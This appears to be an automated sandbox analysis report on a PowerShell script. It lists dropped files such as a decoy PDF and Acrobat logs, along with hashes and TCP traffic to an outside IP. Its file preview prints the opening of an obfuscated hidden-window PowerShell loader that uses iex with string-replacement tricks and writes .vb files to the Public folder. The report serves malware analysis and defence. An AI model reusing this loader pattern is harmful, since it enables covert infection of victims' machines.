                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugq2y25n.gxx.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xt525jpm.ajk.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-19 06-45-17-358.log

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with very long lines (393)
                                                                                      Category:dropped
                                                                                      Size (bytes):16525
                                                                                      Entropy (8bit):5.361022727805069
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:cBD67lQV4j1MOuD/btX+wknz+fzTqyorqz3tVFr84AbAYpfFWbWt+Fjwn0z5O+Wf:4M5
                                                                                      MD5:70A2D078BEFD5E910EE035832171B399
                                                                                      SHA1:1AB91914ECD7852E512C73437D30013594A16FB0
                                                                                      SHA-256:2B55DE84E5446FD295128DAD5827122E98AC784F96A1F422B711B14E8F7DB1ED
                                                                                      SHA-512:9FF36D4E320A8791AB0B87F24CAB4CBE777D9E8A3A64D26AF419132CDFDFCCD9A253EE9854032C4C87C546187951077F869CBCBDC9513278C557FC4895C7DBBC
                                                                                      Malicious:false
                                                                                      Preview:SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:158+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):15114
                                                                                      Entropy (8bit):5.373576383011392
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:GRb4TtmLFODZZO8eLLDdJTe3rohP01Jfs7e6gsQZ4IEvdGk1jaOPk5kp8SE79Agy:mkO
                                                                                      MD5:C763B84348381221398005CEAD5AC3AA
                                                                                      SHA1:75A76535E65E4F7615D8C73531344046A52F256B
                                                                                      SHA-256:7C139A21FDE9F8FDB8241152EDA50ADCE8A9C94D047304BE99D245EB0D436D50
                                                                                      SHA-512:98DC64276E47E9937B9487CF697C394518A934562A35782203BA4D1AF38BC50FCE404762A154CCBB67F4D95E7352EE82A450BE30D680B0C5F2DE2B77268D28F9
                                                                                      Malicious:false
                                                                                      Preview:SessionID=c4818c4b-5399-4e16-9d6a-abc7862d5665.1734608717413 Timestamp=2024-12-19T06:45:17:413-0500 ThreadID=1344 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=c4818c4b-5399-4e16-9d6a-abc7862d5665.1734608717413 Timestamp=2024-12-19T06:45:17:415-0500 ThreadID=1344 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=c4818c4b-5399-4e16-9d6a-abc7862d5665.1734608717413 Timestamp=2024-12-19T06:45:17:415-0500 ThreadID=1344 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=c4818c4b-5399-4e16-9d6a-abc7862d5665.1734608717413 Timestamp=2024-12-19T06:45:17:415-0500 ThreadID=1344 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=c4818c4b-5399-4e16-9d6a-abc7862d5665.1734608717413 Timestamp=2024-12-19T06:45:17:415-0500 ThreadID=1344 Component=ngl-lib_NglAppLib Description="SetConf

                                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):29752
                                                                                      Entropy (8bit):5.416325469650102
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:zcbaIGkcbIcbiIICcbBOQQ0fQNCHPaPOhWPOA3mbSAcbsGC9GZPOdIzZMJzV3Zmn:EGvIcNYdYAphxoAm66k3t65
                                                                                      MD5:23C072E4E15260E6768DF89EE44A527A
                                                                                      SHA1:9C03FFAA2A7713890A15C3EB5159857D097BE7A5
                                                                                      SHA-256:F07A71B7400936E5413E9EE47D4576277D6B98EEE32246BDB0F90933FD7BF22C
                                                                                      SHA-512:A4DAA4A874704452BEA639AEFB3AA7F81D1063A53348C175BE7EC2B1FF99AB984F62FD8B89273A54D3F4486E68E7FB07A7834AA0239B2DACBF3504982A50525D
                                                                                      Malicious:false
                                                                                      Preview:05-10-2023 11:50:33:.---2---..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 11:50:33:.Closing File..05-10-

                                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\60dbd52f-dbf6-4f3a-93ee-33f2799ab37f.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                      Category:dropped
                                                                                      Size (bytes):1407294
                                                                                      Entropy (8bit):7.97605879016224
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                      MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                      SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                      SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                      SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                      Malicious:false
                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\75499f9d-f436-4914-82f8-5677423561dc.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                      Category:dropped
                                                                                      Size (bytes):1419751
                                                                                      Entropy (8bit):7.976496077007677
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:/VRaWL07oXGZ4YIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:tRaWLxXGZ4ZGh3mlind9i4ufFXpAXkru
                                                                                      MD5:41034A6B023B6BB9C723DA146E190954
                                                                                      SHA1:22C95166FF8A1C4D2AAC25B75D804CEBAAA6ACF2
                                                                                      SHA-256:52BB8B0CA62248721986D650004C11ACCB0C988B6FBA645D9B4E3557CA87A15D
                                                                                      SHA-512:6F8CD54BBB750E32FEBD78895F433CCF0C553C56E6B7DDEA03E3EA36ED283084CF6EA6FA8999162999D184B0F04B6E6DAB7F6FC27648EE517F744D7E8DBC8AAD
                                                                                      Malicious:false
                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\b0c05469-4bb0-4ce7-b277-4c37d42bd85e.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                      Category:dropped
                                                                                      Size (bytes):386528
                                                                                      Entropy (8bit):7.9736851559892425
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                      Malicious:false
                                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\ccac9bb9-361e-4c35-a011-5b3e9b25e97b.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                      Category:dropped
                                                                                      Size (bytes):758601
                                                                                      Entropy (8bit):7.98639316555857
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                      MD5:3A49135134665364308390AC398006F1
                                                                                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                      Malicious:false
                                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0JS8BPX19TORJLNUZ9HB.temp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6220
                                                                                      Entropy (8bit):3.742252193264167
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:yZqx1tWbOUCgQoU2fSKukvhkvklCywFgfM9XlLFSogZoS/M9Xl/FSogZo21:71tfUCgA4QkvhkvCCtsM9XaHDM9X6HF
                                                                                      MD5:E889F1A05BB4D72FF954C549D9D24571
                                                                                      SHA1:3B31D9A1FEFF8B2F16381CD5FB293249A08C9E37
                                                                                      SHA-256:E6EB4597B7A60EB1BB3320DB5415905EBB19530E9B0B9B80627F7AAD84263A92
                                                                                      SHA-512:AAFA54ED6E803CC1CEE068C01F1B1B6BCF062DEB1E7FE4356F450E250701A63C87064ED5BEFA142B1018D7AF55C1A680487F3D0FE97D080A65EB3C58AFC0D6E9
                                                                                      Malicious:false
                                                                                      Preview:...................................FL..................F.".. ....N.5q......n.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q....8zj.R..}..o.R......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.]...........................c..A.p.p.D.a.t.a...B.V.1......Y.]..Roaming.@......EW)N.Y.]...........................^..R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.]..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.Y.]..............................W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Y.]....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Y.]....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.]................

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6220
                                                                                      Entropy (8bit):3.742252193264167
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:yZqx1tWbOUCgQoU2fSKukvhkvklCywFgfM9XlLFSogZoS/M9Xl/FSogZo21:71tfUCgA4QkvhkvCCtsM9XaHDM9X6HF
                                                                                      MD5:E889F1A05BB4D72FF954C549D9D24571
                                                                                      SHA1:3B31D9A1FEFF8B2F16381CD5FB293249A08C9E37
                                                                                      SHA-256:E6EB4597B7A60EB1BB3320DB5415905EBB19530E9B0B9B80627F7AAD84263A92
                                                                                      SHA-512:AAFA54ED6E803CC1CEE068C01F1B1B6BCF062DEB1E7FE4356F450E250701A63C87064ED5BEFA142B1018D7AF55C1A680487F3D0FE97D080A65EB3C58AFC0D6E9
                                                                                      Malicious:false
                                                                                      Preview:...................................FL..................F.".. ....N.5q......n.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q....8zj.R..}..o.R......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.]...........................c..A.p.p.D.a.t.a...B.V.1......Y.]..Roaming.@......EW)N.Y.]...........................^..R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.]..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.Y.]..............................W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Y.]....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Y.]....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.]................

                                                                                      C:\Users\user\Desktop\List of Required items and services.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                      Category:dropped
                                                                                      Size (bytes):871324
                                                                                      Entropy (8bit):7.827941732382635
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
                                                                                      MD5:CC648C9FBCD03EAC939663F24ED3AB02
                                                                                      SHA1:56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
                                                                                      SHA-256:F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
                                                                                      SHA-512:5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
                                                                                      Malicious:false
                                                                                      Preview:%PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T

                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):55
                                                                                      Entropy (8bit):4.306461250274409
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                      Malicious:false
                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:ASCII text, with very long lines (841), with no line terminators
                                                                                      Entropy (8bit):5.313016331412009
                                                                                      TrID:
                                                                                        File name:8iAcoQLc3o.ps1
                                                                                        File size:841 bytes
                                                                                        MD5:2bd577dc4641703c479a1482dacd6358
                                                                                        SHA1:fc7e7f29396675e92bb998621fa2f6b706b16617
                                                                                        SHA256:7ce5c4a2b61a6d000da4ca3d4e5869a55349d9a03af50d7560b5485fe6e86935
                                                                                        SHA512:1d43e269c9515a2f4cb4250a8725195466af196c5e9007406063ac724cc189a8f8bd31cea90d85376f0b7e08340dff008ee4ed91e02e8472d54d0b091e25a42d
                                                                                        SSDEEP:12:s8ZDFw9EFf4hew9EF3eDEWEjj/xzPvRbLUhQWgTThUlIeRQKz6VuIrKBdzo2K:XJYEMZEljWIDxNLUhQWAa6KzFpzo2K
                                                                                        TLSH:6C01524966D77AF71100F19630C8553E313A8A0131D504A2B4F0426721ACE3D0EC2D76
                                                                                        File Content Preview:powershell -win hidden $t8ispk=iex($('[Environment]::GetEwnas'''.Replace('wna','nvironmentVariable(''public'') + ''\\hqpoqw.vb')));$flol=iex($('[Environment]::GetEwnas'''.Replace('wna','nvironmentVariable(''public'') + ''\\dmb.vb')));function getit([strin

                                                                                        File Icon

                                                                                        Icon Hash:3270d6baae77db44

                                                                                        Network Behavior

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 19, 2024 12:45:10.664846897 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:10.664901018 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:10.664990902 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:10.673460007 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:10.673474073 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:11.923187017 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:11.923266888 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:11.926462889 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:11.926481962 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:11.926695108 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:11.933955908 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:11.975338936 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.388153076 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.436533928 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.508120060 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.508135080 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.508162022 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.508176088 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.508187056 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.508192062 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.508219004 CET44349718107.161.23.150192.168.2.10
